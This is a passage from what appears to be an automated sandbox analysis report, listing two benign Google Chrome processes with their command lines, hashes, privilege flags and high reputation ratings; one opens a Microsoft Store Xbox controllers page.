                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.microsoft.com/en-us/store/collections/xboxcontrollers?ocid=cmmwjk1aljr&form=M7001T&msclkid=8a1d859a8e6b186635d8e16d33c8a052
                                              Imagebase:0x7ff6a8a00000
                                              File size:2'852'640 bytes
                                              MD5 hash:7BC7B4AEDC055BB02BCB52710132E9E1
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:25
                                              Start time:01:46:42
                                              Start date:06/09/2023
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1988 --field-trial-handle=1904,i,9688891410887810874,4516259265588636575,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                              Imagebase:0x7ff6a8a00000
                                              File size:2'852'640 bytes
                                              MD5 hash:7BC7B4AEDC055BB02BCB52710132E9E1
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              No disassembly